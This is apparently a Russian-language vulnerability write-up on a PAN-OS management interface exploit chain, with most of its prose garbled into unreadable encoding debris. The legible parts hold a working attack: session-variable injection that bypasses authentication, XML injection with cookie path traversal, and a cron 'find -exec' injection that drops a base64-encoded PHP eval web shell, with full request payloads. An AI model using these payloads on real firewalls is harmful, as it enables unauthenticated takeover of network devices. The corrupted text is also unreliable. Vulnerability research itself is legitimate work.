??�???�???,� ???� ???�???� ??????� ???????�??� ???�???� ??� ???????�??� ????
???� ??????� ??????� ?� ??????,� ?� ???�??� ???,� ?� ???????� ???�??� ????,� ?
???� ??????�??� ??� ?????.� ?� ?????�??� ???????�???� ?� PAN?OS� ??????�???�?
?????� ?????�?� ??� ???�??????,� ???????� ????�???� ???�???�?� ???????�??� ????�
??????.
???�?????�???�??� ????� /etc/appweb3/conf/common.conf� ?????�??
???�??�??�????,�??????�??�???�???�???�???.�??�????�????�??�??�???�
??????�???�??:
/etc/appweb3/conf/common.conf
144:�Location�/php/monitor>牋
145:牋燬etHandler爌hpHandler牋
146:牋爌anAuthCheck爋n
147:�/Location>
148:�Location�/php/utils>
149:牋燬etHandler爌hpHandler牋
150:牋爌anAuthCheck爋n
151:�/Location>
152:�Location�/php>�
153:牋爌anAuthCheck爋n
154:�/Location>
155:�Location�/PAN_help>
156:牋爌anAuthCheck爋n
157:�/Location>
...
162:�Location�/upload>
163:牋牋牋panAuthCheck爋n
164:牋牋牋AddInputFilter爑ploadFilter
165:�/Location>
??�??�???� panAuthCheck,� ????�??�?????� ?� on,� ???�???�?� ???�??�??� URI
????�???�???�??� ???�??.� ???� ?????�?� ?????�?� ??� ??????� ????�?� ???????
???�??� ????�?????�?� ???�???�???� ??� ???????� ?????�??� ?????�?????�??.
??� ???� ????�???� ???�????�?� /usr/local/lib/shobjs/libpanApiWgetFil?
ter.so.
/etc/appweb3/conf/common.conf
60:燣oadModulePath�"/usr/local/lib/shobjs:/usr/local/lib32/shobjs"
61:燣oadModule爌anappweb3Module爈ibpanappweb3
62:燣oadModule爌anApiWgetFilter爈ibpanApiWgetFilter
63:燣oadModule爌anAuthFilter爈ibpanApiWgetFilter
??�??�??�???爋penAuthFilter�??�???�?�??????�??�???�??�???燩HPSES?
SID��?????�?�??????�??�??�???� readSessionVarsFromFile�??�??�????
?�????�????�??�??�??????�??�(dloc�爑ser)�?�??�?�??�??.
libpanApiWgetFilter.c
1282:爒oid燺_cdecl爋penAuthFilter(MaQueue_0�*q)
1283:爗
...
1310:牋爄f�(爂etCookieValues(&myFuncResult,爌trMyAuthFilter)�)
...
1320:牋牋爒1�爉aGetStageData(ptrMyAuthFilter?>conn,�"panAuthFilter.
PHPSESSID");
...
1321:牋牋爃asSessionCookie�爒1�!=�
1322:牋牋爄f�(爒1�!=�
1323:牋牋爗
1324:牋牋牋爄f�(爎eadSessionVarsFromFile(ptrMyFuncResult,爌trMyA
uthFilter)�)
libpanApiWgetFilter.c
818:爌an_result_t燺_cdecl爎eadSessionVarsFromFile(ptrFuncResult�
result,爌trAuthFilter爉e)
819:爗
...
845:牋爏sid�爉yGetStageData(me?>conn,�"panAuthFilter.PHPSESSID");
...
847:牋爌ath��(pan_char_t�*)__pan_calloc(me?>allocator,�爌athSize);
848:牋爄f�(爌ath�)
849:牋爗
850:牋牋爏printf(path,�"%s%s%s",�"/tmp/",�"sess_",爏sid);
851:牋牋爁p�爁open(path,�"r");
????�?????� ???�?� ?� ???� ???�?????� ?????�????� ????�??�?,� ???????� ????�?
???????�??�??�??.�???�?�???�??�?�??�???�?????�?�???????????�????�
???�???� ???�??�?� ???� ??????� ?� ????�??�????�???� ???�???,� ???�????�???
??????�?�???,�??????�???�???�?�????�?�??????� strtok�??�??�?????
????�?�?�??�?.
libpanApiWgetFilter.c
886:牋牋牋牋牋牋爁seek(fp,��;
887:牋牋牋牋牋牋爄f�(爁read(buf,爏buf.st_size,�,爁p)�=�
888:牋牋牋牋牋牋爗
889:牋牋牋牋牋牋牋爁close(fp);
890:牋牋牋牋牋牋牋燽uf[sbuf.st_size]��
891:牋牋牋牋牋牋牋燿elim��"|";
892:牋牋牋牋牋牋牋爎emaining��
893:牋牋牋牋牋牋牋爏key�爏trtok_r(buf,�"|",�&remaining);
894:牋牋牋牋牋牋牋燿o
895:牋牋牋牋牋牋牋爗
896:牋牋牋牋牋牋牋牋爄f�(�!skey�)
897:牋牋牋牋牋牋牋牋牋燽reak;
898:牋牋牋牋牋牋牋牋爄f�(�!remaining�)
899:牋牋牋牋牋牋牋牋牋燽reak;
900:牋牋牋牋牋牋牋牋爎emaining2��
901:牋牋牋牋牋牋牋牋爌tType�爏trtok_r(remaining,�":",�&remaining2);
902:牋牋牋牋牋牋牋牋爄f�(�!ptType�)
903:牋牋牋牋牋牋牋牋牋燽reak;
904:牋牋牋牋牋牋牋牋爏trtok_r(0,�":",�&remaining2);
...
920:牋牋牋牋牋牋牋牋牋爏key�爏trtok_r(remaining2,燿elim,�&remaining)
;
...
924:牋牋牋牋牋牋牋牋牋爐SkeyValue�爏trtok_r(0,�";",�&remaining2);
925:牋牋牋牋牋牋牋牋牋爄f�(�*ptType�=�5�)
926:牋牋牋牋牋牋牋牋牋爗
927:牋牋牋牋牋牋牋牋牋牋爐Skey��
928:牋牋牋牋牋牋牋牋牋牋爄f�(�!strcasecmp("dloc",爏key)�)
929:牋牋牋牋牋牋牋牋牋牋爗
930:牋牋牋牋牋牋牋牋牋牋牋爐Skey��"panAuthFilter.dloc";
931:牋牋牋牋牋牋牋牋牋牋爙
932:牋牋牋牋牋牋牋牋牋牋爀lse爄f�(�!strcasecmp("user",爏key)�)
933:牋牋牋牋牋牋牋牋牋牋爗
934:牋牋牋牋牋牋牋牋牋牋牋爐Skey��"panAuthFilter.user";
935:牋牋牋牋牋牋牋牋牋牋爙
936:牋牋牋牋牋牋牋牋牋牋爄f�(爐Skey�&&爐SkeyValue�&&�*tSkeyValue�)
937:牋牋牋牋牋牋牋牋牋牋爗
...
950:牋牋牋牋牋牋牋牋牋爏key�爏trtok_r(0,燿elim,�&remaining2);
951:牋牋牋牋牋牋牋牋牋爎emaining�爎emaining2;
...
954:牋牋牋牋牋牋牋爓hile�(爏key�&&�*skey�!=��);
955:牋牋牋牋牋牋牋爄f�(�!maGetStageData(me?>conn,�"panAuthFilter.
user")�)
956:牋牋牋牋牋牋牋牋爉prLog(
957:牋牋牋牋牋牋牋牋牋爂lobalMpr,
958:牋牋牋牋牋牋牋牋牋�
959:牋牋牋牋牋牋牋牋牋�"panAuthFilter:panAuthFiler:爉anagement�
cookie爉issing.爁ile爏ize�%d",
960:牋牋牋牋牋牋牋牋牋爏buf.st_size);
961:牋牋牋牋牋牋牋爄f�(�!maGetStageData(me?>conn,�"panAuthFilter.
dloc")�)
962:牋牋牋牋牋牋牋牋爉prLog(globalMpr,��"panAuthFilter:panAut
hFilter:燿loc燾ookie爉issing.爁ile爏ize�%d",爏buf.st_size);
963:牋牋牋牋牋牋牋燺_pan_free(me?>allocator,爌ath,爌athSize);
964:牋牋牋牋牋牋牋燺_pan_free(me?>allocator,燽uf,燽ufSize);
965:牋牋牋牋牋牋牋爒3��
966:牋牋牋牋牋牋爙
???� ???�??� ????�???�?????� ???�??� ?????� ??� ??,� ???� ???�??�???� ???�???
serialize�燩HP.
???_??????????|s:?????_??????????:"????????";�??_??????????|s:?????_
??????????:"???_????????";
?� ???� ?????.� ???� ???�??????� ???�????� ???????�??� ??????�???�?� ???�?
?� ???????.� ???,� ?????� ?????�????� ?????�??� ???????�??� ???�??,� ???????
???????� ???� ?� ????�?????� ???�??�??�??.� ???�????,� ??� ?????� ?????�???
??????�??� ???�????,� ??????�??� ?� ?????�??� ??� ???�????� ???�?????�???�????
";.�??�??�?�????????�??�???�?�??????�??爑ser.
??�???�???�???�??�?�??�???????,�??????�??�????�??�???????�???�
???� ?� ????� ???�??.� ???�?????� ??� ??????� cms_changeDeviceContext.esp,
?� ???????� ???�???�??� ??????� ?� ???????�??� $_SESSION.� ???� ???�?� ???�???
???�???�???�??.
/var/appweb/htdocs/esp/cms_changeDeviceContext.esp
02:燱ebSession::start();
03:爎equire�'panmodule.php';
04:�
05:爁oreach�($_SESSION燼s�$key�>�$value)爗
06:牋if�(strpos($key,�"dSId_")�==�爗
07:牋爑nset($_SESSION[$key]);
08:牋}
09:爙
10:�/**燖noinspection燩hpUndefinedFunctionInspection�*/
11:�$string_argout�爌anUserSetDeviceLocation($_SESSION['user'],�$
_GET['device'],�爊ew爌hp_string_argout());
???�???� panUserSetDeviceLocation�??????�?��??�??�?????�??�????�?
/usr/lib/php/modules/panmodule.so.
/etc/appweb3/php.ini
455:爀xtension_dir��"/usr/lib/php/modules"
...
552:爀xtension=panmodule.so
???�?� ???�??????,� ???� ???�???�??� ?� ???????�???� ?� ???�???� ???????�???,
???�??�????�?�????�??�???營DA.�??�?�??�??�???� ???�???�??�??�??� ?
??� ???� ????�?� ???�??,� ??????� ???� ???�????�?� ????�?????�???� ???� ????�???�
????營ntel�386.
??�??�??�??�???�??�??�???爌anUserSetDeviceLocation
??�????� deviceStr�?????�?��??�???�?燯RL�??????�?� device�(????????�
???� $_GET['device']).� ?????� ???�????� ??????�?� ?� panPhpConvertString?
ToLoc.
panmodule.c
18464:爌an_uint32_t燺_cdecl爌anUserSetDeviceLocation(char�*cookie,�
char�*deviceStr,爄nt爑seWriteFmt,爌hp_string_argout�*string_argout)
18465:爗
...
18498:牋爄f�(爌anPhpConvertStringToLoc(deviceStr,�&dloc)�)
??�???�?????�?�??�???�?�??�??�?�??�?????.
??�???�?????�??�???爌anPhpConvertStringToLoc
???�????�?�??�???�??�??�??�??�????�???�?��??????�??�????.
panmodule.c
19354:牋爏trcpy(seps,�":");
...
19362:牋牋爒3�燺_strtok_r(strCopy,爏eps,�(char�**)tmpBuf);
19363:牋牋爄f�(爒3�)
...
19377:牋牋牋牋牋爈oc?>loc�爏trtol(v3,��);
???�???�??�?� ?????� ???�????�?� ???�??�??,� ?� ???�??� ???�?� ???�?� ???�???�
?????� ??????�???� ?� ???????�??� deviceName.� ???�??� ???�??� ?????� ????�
?????� 0x20� ???�??.� ????� ???????�??� ???�????� ???�?????� ????�???� ????�
????,�?�??�?????�??�????�???�???.
19370:牋牋牋牋牋爄f�(爒4�=�
19371:牋牋牋牋牋牋爏strncpy(loc?>deviceName,爒3,�);
??�??� ????� ?????� ???�????�?� ???�???� ?� ???�??�???� ?� ?????�???�?� ????�
?????�??�??�????,�???�?�??�??????�??爒sysName.
19373:牋牋牋牋牋牋爏strncpy(loc?>vsysName,爒3,�);
???�?� ???�?� ???????�??� ???????�??� deviceName� ??????�???�?� ?� ???�???
panPhpSetDeviceForSession�??�???�?????�???�??�?.
18505:牋牋爒4�爌anPhpSetDeviceForSession(cookie,燿loc.deviceName,�
errMsg,�200u);
...
20823:爏igned爄nt燺_cdecl爌anPhpSetDeviceForSession(pan_char_t�*
cookie,爌an_char_t�*devName,爌an_char_t�*errMsgBuf,爌an_uint32_t�
bufSize)
20824:爗
...
20829:牋爌an_char_t爁irstVsys[32];�//燵sp+30h]燵bp?2Ch]@6
...
20846:牋牋爏strncpy(firstVsys,�"vsys1",�);
?� ???�??�?� ?????�????� ????� ???�???� ???�???�??� ?????� panPhpSetDevice?
AndVsysForSession,�??????�???�??�???�?�??�????�??????�??燿loc�爈oc
?�???�???�???��??????�???�??�???.
19328:牋爌anPhpSetSessionVar("dloc",爐mpLocStr);
19329:牋爐mpLoc.loc��(unsigned爄nt)panSwalIsVsysName(vsysName)��
128��;
19330:牋爄f�(爒sysName�)
19331:牋爗
19332:牋牋爄f�(�!*vsysName�)
19333:牋牋牋爐mpLoc.loc��
19334:牋牋爏strncpy(tmpLoc.vsysName,爒sysName,�);
19335:牋牋爌anPhpConvertLocToString(&tmpLoc,爐mpLocStr,�100u);
19336:牋牋爌anPhpSetSessionVar("loc",爐mpLocStr);
???�???�??�????�??�??:
https://panos.visualhack:4443/esp/cms_changeDeviceContext.
esp?device=1024:aaaa:bbbb
???�??�?�??�????�??�?�??�??��?????��??�??????�??
???�?�??�??�??�??�??�??�??????�??�????�????�??�?????�??�????:
dloc|s:6:"8:aaaa";loc|s:13:"16:aaaa:vsys1";
dloc|s:6:"8:aaaa";
loc|s:13:"16:aaaa:vsys1";
dloc��"8:aaaa"
loc牋=�"16:aaaa:vsys1"
??�???� ???� ???�??� ???�???� ?????� ???�?????�?� ?????�????� ???�??
???�?????� panCheckSessionExpired,��??�??�??????�????�????�???�?
panBuildQueryCheckSessionExpired� ??� ???� ?????�???� ???� ???�????�?�
/usr/local/lib/shobjs/libpanApiWgetFilter.so.
libpanApiWgetFilter.c
1058:爌an_result_t燺_cdecl爌anCheckSessionExpired(ptrFuncResult�
result,爌trAuthFilter爉e)
1059:爗
...
1079:牋爎etval�爌anBuildQueryCheckSessionExpired(&myFuncResult,爉e,�
0);
libpanApiWgetFilter.c
1037:爌an_result_t燺_cdecl爌anBuildQueryCheckSessionExpired(ptrFun
cResult爎esult,爌trAuthFilter爉e,燽ool爎efresh)
1038:爗
1039:牋爌an_char_t�*user;�//燬T1C_4@1
1040:牋燾onst燾har�*v4;�//爀ax@2
1041:牋爄nt爒6;�//燵sp+Ch]燵bp?1Ch]@1
1042:�
1043:牋爑ser�爉yGetStageData(me?>conn,�"panAuthFilter.user");
1044:牋爌an_string_buffer_appendf(result?>data.str,�"<request�
cmd='op'燾ookie='%s'�%s",爑ser,�&unk_8665);
1045:牋爄f�(爎efresh�)
1046:牋牋爒4��"yes";
1047:牋爀lse
1048:牋牋爒4��"no";
1049:牋爌an_string_buffer_appendf(result?>data.str,�"爎efresh='%s'>",
v4,爒6);
1050:牋爌an_string_buffer_append(result?>data.str,�"<operations�
xml='yes'><show><cli><idle?timeout/></cli></show>");
1051:牋爌an_string_buffer_append(result?>data.str,�"</operations></
request>");
1052:牋爎eturn�
1053:爙
???� ???�???� ???�???�?� XML????�??� ?� ?????�?,� ???????� ???�??� ????� ?????
?�??�????�??�????�?????�?????�??�??.
???�?� ?????�????� ?????�?� ?� ???� ???�?� ????,� ???�?� ???????�??� user.
???� ??� ????�???,� ????� ?� ???� ??� ???�???� ???�???� ??� ???�??� ???�??�??
???????�??�??�??�??�??�?�??�?�??�??.�??,�??�??�??�?,��??�????�
???????�??�?????�??????�??.
https://panos.visualhack:4443/esp/cms_changeDeviceContext.
esp?device=1024:aaaa%27";user|s:
???�????�??????�??��??�??
?????:
dloc|s:15:"8:aaaa'";user|s";loc|s:22:"16:aaaa'";user|s:vsys1";
dloc|s:15:"8:aaaa'";
user|s";loc|s:22:"16:aaaa'";
user|s:vsys1";
???�?� ??????� ???�???� ???????�??� user� (panAuthFilter.user)� ???�????�?
???�??� 16:aaaa'.� ?� ??????�????� ??????� ???�???� panBuildQueryCheckSes?
sionExpired�????�??�?????燲ML????�??:
<request燾md='op'燾ookie='16:aaaa''牋refresh='no'>
牋�operations爔ml='yes'>
牋牋牋�show><cli><idle?timeout/></cli></show>
牋�/operations>
</request>
??�??�?????�??� ???�??�??� ?????�?� ????�?� XML� ???????�??,� ?� ???�??� ????�
???�???�?�???
<response爏tatus="error"燾ode="18">
牋�msg>
牋牋牋�line>Malformed燫equest</line>
牋�/msg>
</response>
??�???� ???�???� panCheckSessionExpired� ???� ???�?� ???�??� ???�???,
???�????�???�???,�??�????�?????�??�???�???��??�??�????�?.
libpanApiWgetFilter.c
1337:牋牋牋牋牋爄f�(爌anCheckSessionExpired(ptrMyFuncResult,爌trMyA
uthFilter)�=�
1338:牋牋牋牋牋爗
...
1341:牋牋牋牋牋爙
1342:牋牋牋牋牋爀lse
1343:牋牋牋牋牋爗
1344:牋牋牋牋牋牋爉prLog(globalMpr,��"panAuthFilter:openAuthFilter�
%s燱e燼re燿one!!!",爌trMyAuthFilter?>conn?>request?>url);
1345:牋牋牋牋牋爙
???�?????� ??????????� ????�?� ????�???�??� ???�?� ??� ????�??�??� ????�???:
https://panos.visualhack:4443/php/utils/debug.php.
??�?????�????�???�???�??��??�????�??�???�???�??????
???�?� ???�????� ?????� ???�??� ??� ???�???� ??????� ??� ???�??,� ???????� ????�
????�????�????爌anAuthCheck.
??????????? ??????
?
? �?????�?????
?????
????? ???????
??????�??????????????�??????????
??????????��?燩ALO燗LTO燦ETWORKS
????????�?????????
??�???�??� ?� ???�?????� ???�????�?.� ???� ?� ?� ?????� ???�????�??� ???�???,
?燩AN?OS�??�???燗PI.�??�?�?????�??�??�??�???��???,�??�?�??????�
??????�?????爎oute.php�?�??�?��??�???�?.
??�???� ???�??� ?� ?????�?� ???�????� ????�?� ???� ????�???�??�??� ?????�
??????�??.�??�?�???�???,�???��??�??�??�???�??????�????.�??�??
???�??� ???�???�??� ?� ???�??� ????�?????�??� ???�??,� ???????�??� ???????�
????�??�?�???�???�??�???,��???��??�?.
/var/appweb/htdocs/php/utils/router.php
3:爎equire_once($_SERVER['DOCUMENT_ROOT']�.�'/../htdocs/php/include/
common.php');
4:爎equire_once($_SERVER['DOCUMENT_ROOT']�.�'/../htdocs/php/include/
ExtDirect.php');
5:�
6:燾lass燛xtDirect_Router爀xtends燫outerAbstract爗
7:牋牋爌rivate�$_api;
???�??�????�??�?�???????,�??�????�??�??�????�??�?爎outer.php.�???�
?????,�
???�?�
?????�???�
Administrator.get,�
????�?�
???�??
?爃ttps://panos.visualhack:4443/php/utils/router.php/Administrator.get.�??�????�
??.� ??� ????�??�??� ???�??�??�?� ???� ????�?� ???� ?????,� ???� ???� ????�????.
???�???� ???�???�?� ?????�???� ????�?� ExtDirect_Router,� ???????� ????�???
???�????�??燫outerAbstract.
/var/appweb/htdocs/php/utils/router.php
6:燾lass燛xtDirect_Router爀xtends燫outerAbstract爗
7:牋牋爌rivate�$_api;
...
86:�$router�爊ew燛xtDirect_Router();
87:燞ttp::headerType('json');
88:爀cho�$router?>getResponse();
??�??� getResponse� ??????�?� dispatch,� ?� ?� ?????�??� ????�??�?� ??????�???
???�??,�??????�?�?????�?��??�???��???燡SON.
/var/appweb/htdocs/php/include/RouterAbstract.php
111:牋牋爌ublic爁unction爂etResponse(array�$requestData=array())爗
112:牋牋牋牋爄f�(empty($requestData))
113:牋牋牋牋牋牋�$requestData=$GLOBALS;
114:�
115:牋牋牋牋爎eturn�$this?>dispatch($requestData);
116:牋牋爙
/var/appweb/htdocs/php/include/RouterAbstract.php
25:牋牋爌rivate爁unction燿ispatch(array�$requestData)爗
26:牋牋牋牋�$request牋=�$this?>parseRequest($requestData);
??�??� parseRequest� ??????�???� ???�???� json_decode,� ???�?� ????�??�???
???????�??�??�??��???�??�???.
/var/appweb/htdocs/php/include/RouterAbstract.php
18:牋牋爌rotected爁unction爌arseRequest(array�$requestData)爗
19:牋牋牋牋爄f�(isset($requestData['HTTP_RAW_POST_DATA']))爗
20:牋牋牋牋牋牋爎eturn爅son_decode($requestData['HTTP_RAW_POST_DATA'
]);
21:牋牋牋牋爙
22:牋牋牋牋爎eturn爊ull;
23:牋牋爙
????�??�????�??????????�????�??�??�??.
{
牋�"action":�"PanDirect",
牋�"method":�"execute",
牋�"data":燵
牋牋牋�"07c5807d0d927dcd0980f86024e5208b",
牋牋牋�"Administrator.get",
牋牋牋爗
牋牋牋牋牋�"changeMyPassword":爐rue,
牋牋牋牋牋�"template":�"asd",
牋牋牋牋牋�"id":�"admin"
牋牋牋爙
牋燷,
牋�"type":�"rpc",
牋�"tid":�3
}
???�?�???�??燡SON�??�????�???�?��??�??,�????� rpc�??�???�?,�?????�
???�?�?�??�??�??�????��????�?�??????�??� action�� method� ????�????�
????�?.
/var/appweb/htdocs/php/include/RouterAbstract.php
27:牋牋牋牋�$response��$this?>rpc($request);
/var/appweb/htdocs/php/include/RouterAbstract.php
49:牋牋爌rivate爁unction爎pc($request)爗
50:牋牋牋牋爐ry爗
51:牋牋牋牋牋牋�$class牋=燲ml::escape($request?>action);
52:牋牋牋牋牋牋�$method�燲ml::escape($request?>method);
53:牋牋牋牋牋牋�$tid�燲ml::escape($request?>tid);
54:牋牋牋牋牋牋�$params��$request?>data;
55:�
56:牋牋牋牋牋牋�$v=$this?>isValidMethod($class,�$method);
???�?????� ?????� ???�???�?� ???�??� ????�?,� ???????� ???�??� ?� $request?>
action,� ?� ?????� ???�??� ???� PanDirect.� ???�???�???� ?????� call_user_?
func_array� ???�????� ?� ?????�????� PanDirect?>execute� ???� ?� ?????�??
???????�??�??�???�??�??�?�??�???燿ata.
74:牋牋牋牋牋牋�$instance=爊ew�$request?>action;
...
77:牋牋牋牋牋牋�$retval=call_user_func_array(array($instance,$method)
,�$params);
??�???�??�?�?????�??�?????.
/var/appweb/htdocs/php/include/PanDirectLite.php
59:牋牋爁unction爀xecute($callFunction,�$jsonArgs)爗
60:牋牋牋牋�/*燖var�$reflection燫eflectionClass�*/
61:牋牋牋牋�/*燖var�$method燫eflectionMethod�*/
62:牋牋牋牋爈ist($reflection,�$isStatic,�$method)��$this?>checkV
alidRemoteCall($callFunction,爐rue);
63:牋牋牋牋爄f�($isStatic)爗
64:牋牋牋牋牋牋爎eturn�$method?>invokeArgs(NULL,燼rray($jsonArgs));
65:牋牋牋牋爙爀lse爗
66:牋牋牋牋牋牋�$obj��$reflection?>newInstanceArgs(array($jsonArgs))
;
67:牋牋牋牋牋牋爎eturn�$obj?>$method();
68:牋牋牋牋爙
69:牋牋爙
? checkValidRemoteCall� ?????�???� ???�??�?� ??????:� ???�????� ??� ????�
?????�??�??�???
? ??�?�?,�?�????�???�?�??�??�??�????.�???�??,�?�??????�??� $obj
???�????�?� ?????�??�??� ???�??�???� ????�?.� ?� ?????� ???�??� ???� Admin�
istrator?
? $obj�$method()�?????�?�??�??�??�????,��????�??�??�??爂et.
??�?��???�??�??�??�??�??�???� changeMyPassword,�?�??�???�??�????
??????爂etConfigByXpath.
/var/appweb/htdocs/php/device/Administrator.php
10:燾lass燗dministrator爀xtends燤anagementConfigAbstraction爗
...
85:牋牋爌ublic爁unction爂et()爗
...
86:牋牋牋牋�//燿etail爒iewer
87:牋牋牋牋爄f�(爄sset($this?>jsonArgs?>changeMyPassword)�)爗
88:牋牋牋牋牋牋爎eturn燚irect::getConfigByXpath("/config/mgt?config/
users/entry[@name='"�.�$this?>jsonArgs?>id�.�"']");
????�????�??�???�?爔path,�??????�????�?????�??�????�?爉gmtsrvr.
/var/appweb/htdocs/php/include/Direct.php
688:牋牋爏tatic爁unction爂etConfigByXpath($xpath,�$attribute=null,�$
options=null)爗
689:牋牋牋牋�$req�燲mlRequest::get($xpath,�$attribute);
690:牋牋牋牋爎eturn�$xmlDoc�燘ackend::getArray($req,�$options);
691:牋牋爙
/var/appweb/htdocs/php/include/Backend.php
377:牋牋爏tatic爁unction爂etArray($req,�$options=NULL,�$connec
tionOptions�爊ull)爗
378:牋牋牋牋�$dom�爏elf::getDom($req,�$connectionOptions);
/var/appweb/htdocs/php/include/Backend.php
350:牋牋爏tatic爁unction爂etDom($msg,�$connectionOptions�爊ull)爗
351:牋牋牋牋�$msg�爏elf::massageMsg($msg);
352:牋牋牋牋�$data�爏elf::getConnection()?>send($msg,�$connec
tionOptions);
/var/appweb/htdocs/php/include/MSConnection.php
07:燾lass燤SConnection爗
...
43:牋牋爁unction爏end($requestXml,�$connectionOptions�爊ull)爗
...
50:牋牋牋牋牋牋�$this?>writePayload($requestXml,�$payloadLength);
/var/appweb/htdocs/php/include/MSConnection.php
07:燾lass燤SConnection爗
...
95:牋牋爌ublic爁unction爓ritePayload(&�$requestXml,�$payloadLength)爗
96:牋牋牋牋爏ocket_write($this?>sock,�$requestXml,�$payloadLength);
97:牋牋爙
?�?????�???�?�??�??�??�??�??�????燲ML:
<request燾md="get"
牋爋bj="/config/mgt?config/users/entry[@name='admin']"
牋燾ookie="cb3824b1b1fd3ac7138682ed67e03b8e"/>
</request>
???� ????�??�?� ???????�???� ???�???� ?????� mgmtsrvr� ?????�???� ???�???
pan_mgmtsrvr_client_svc.
mgmtsrvr.c
3603:爒oid�*__cdecl燺_noreturn爌an_mgmtsrvr_client_svc(void�*arg)
3604:爗
?� ???????,� ????�???�???� pan_jobmgr_store_job_result� ??� ????????� ????�
?????�?� /usr/local/lib/libpanmp_mp.so.1.� ???�???� ???�???� ???�??�??
????� XML� ?� ?????�????� /opt/pancfg/session/pan/user_tmp/{cookie}/{
jobid}.xml,�??燾ookie��??�???�??�?�???爎equest.
??�??�??�??�????�??�??�??�???爌an_jobmgr_store_job_result
libpanmp_mp.so.1.c
401430:爏igned爄nt燺_usercall爌an_jobmgr_store_job_result@<eax>(int�
a1@<eax>,爄nt燼2@<edx>)
401431:爗
...
401440:牋牋爄f�(燼1�)
401441:牋牋爗
401442:牋牋牋爏nprintf(&v5,�400u,�"%s%s",�"/opt/pancfg/session/pan/
user_tmp/",�*(_DWORD�*)(a1�+�6));
401443:牋牋牋爄f�(爌an_dir_create_tree(&v5)�=�
???�????��??�?????�???�???.�??�??�????�?�???�??�?�???�????????�
????�??�??,�????�?�??�????燲ML????�????,�??�???�?�??????�?�????
???�???� ????�??� cookie.� ???� ????�??�?� ????� ??????� ?????� ???�???� ???�?
?�??�?????�??�??�??.��?????�??�??�???爌ath爐raversal,�?�????�??�?
??� ???�??�??� ???�?� ?� ???�???� ?????�????� ?� ?????� ???�?� ??� ???�?,� ???
???�??�??�???�???�???�???�?�???.�)
???�????�??�??�????�??�?????�??�?爅bfc��????�????爐mp:
{
牋�"action":�"PanDirect",
牋�"method":�"execute",
牋�"data":燵
牋牋牋�"07c5807d0d927dcd0980f86024e5208b",
牋牋牋�"Administrator.get",
牋牋牋爗
牋牋牋牋牋�"changeMyPassword":爐rue,
牋牋牋牋牋�"template":�"asd",
牋牋牋牋牋�"id":�"admin']\"燼sync?mode='yes'爎efresh='yes'�
?ookie='../../../../../../tmp/jbfc'/>\u0000"
牋牋牋爙
牋燷,
牋�"type":�"rpc",
牋�"tid":�3
}
???�?� ?????�???� ??� ????�???,� ???????� ?????�???� ?????� XmlRequest::get(
$xpath,�$attribute),�??�???�???�?�??�??�??�??爊ull????�??.
/var/appweb/htdocs/php/include/XmlRequest.php
39:牋牋爏tatic爁unction爂et($xpath,�$attributes�爊ull)爗
40:牋牋牋牋爎eturn爏printf('<request燾md=\'get\'爋bj="%s"燾ookie="%s"
%s></request>',
41:牋牋牋牋牋牋�$xpath,燬ession::cookie(),爏elf::appendAttributes($
attributes));
42:牋牋爙
??????�燫CE
??�???????� ??� ????�???????� ?� ??????� ????�??�???� ?� ?????�????� ????�
??????�??�?????��??�???.
??�??� ????�??� ???�???� ??� ????�??�?� ???� ???�????�???� ???????,� ???
?� ?????� ???�??�?� ?????� cron� ?� ?????�???� ???�??� ?????�?.� ????� ??� ???� ?
???� /usr/local/bin/genindex_batch.sh,� ??� ??????�?� /usr/local/bin/
genindex.sh,�??????�???�???�?�???�??????�??�??�??��?.
/usr/local/bin/genindex_batch.sh
9:�/usr/local/bin/genindex.sh�$date�>�/var/log/pan/indexgen.log�&1
?????�???�???�??�??�????�???,�??????�????�???�????�??�??��?????�
?????�$PAN_BASE_DIR/logdb/$dir/1�(/opt/pancfg/mgmt/logdb/$dir/1).
genindex_batch.sh
2:爀xport燩AN_BASE_DIR=/opt/pancfg/mgmt
/usr/local/bin/genindex.sh
222:牋牋echo�"Updating爄ndices爁or�$db燿b"
223:牋牋for燿ay爄n燻find�$PAN_BASE_DIR/logdb/$dir/1�mindepth�
maxdepth�mtime�30爘爏ort�r`
??�??�?????�??�???�?�?�??????�???�???�?��????�???�????�????�?.
???� ????�???�?� ??� ????� ?????�?,� ?� ??,� ???� ???� ?????�????� (???????�??
$day)�?????�?��??????�???�???�?.
/usr/local/bin/genindex.sh
227:牋牋牋for爈ogfile爄n燻find�$day�mmin�+5�name爌an.*.log爘爏ort�
r`
??�???,�?????�??�??�??�??�??�???�??�????�????�????��??�?????�??
???�??,� ??� ???�??� ????�???� ???????�?� ?� ?????� ?????�???� ?nd.� ??????
??????�?�??�?,�???��???�???�?????�???�??�???????�exec.
???�????�??????�???�?�???:�??�?�??�???�??�??�???�??�?�?????�
????�?�??�??�??�??�????�?.燯NIX??????�??�??�???�???�??�?��??�????�
??�??�??��?????�??�?????�?�??�???�?,�??燱indows.�?�???�???�??�?
???�?????� ????�?� ???�???� ???�?� (/)� ?� null?????� (\0),� ???� ??????�??� ???�?
???�??�?� ??????�?????.� ?� PoC� ???� ???????�??� ??????� ??????�???�?� Python
?燘ase64.
f=open('/var/appweb/htdocs/poc.php',�'w');f.write("<?php燖eval(
$_POST['jbfcthere']);?>");f.close();
python�c爀xec("Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd
3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjdGhlcmUnXSk7Pz
4iKTtmLmNsb3NlKCk7".decode("base64"))
?�????�??�?????�??�??�??�??�????�?????,�??????�??�???燩HP?????,
???�?????� ??� ???�??�?.� ??� ????�????� ???????� ???�?????�???� ??� ????�?�
/var/appweb/htdocs/,�????�?�???爌oc.php�??�???�?�???�?�??.
{
牋�"action":�"PanDirect",
牋�"method":�"execute",
牋�"data":燵
牋牋牋�"07c5807d0d927dcd0980f86024e5208b",
牋牋牋�"Administrator.get",
牋牋牋爗
牋牋牋牋牋�"changeMyPassword":爐rue,
牋牋牋牋牋�"template":�"asd",
牋牋牋牋牋�"id":�"admin']\"燼sync?mode='yes'爎efresh='yes'�
cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/*�print�
?exec爌ython�c爀xec(\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLn
BocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2Fza
GVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\".decode(\"base64\"))�'/>\u0000"
牋牋牋爙
牋燷,
牋�"type":�"rpc",
牋�"tid":�3
}
??�???�???,� ??� ??????� ??????�?????� ????� ?????�?,� ????�?� ????�?� ????�
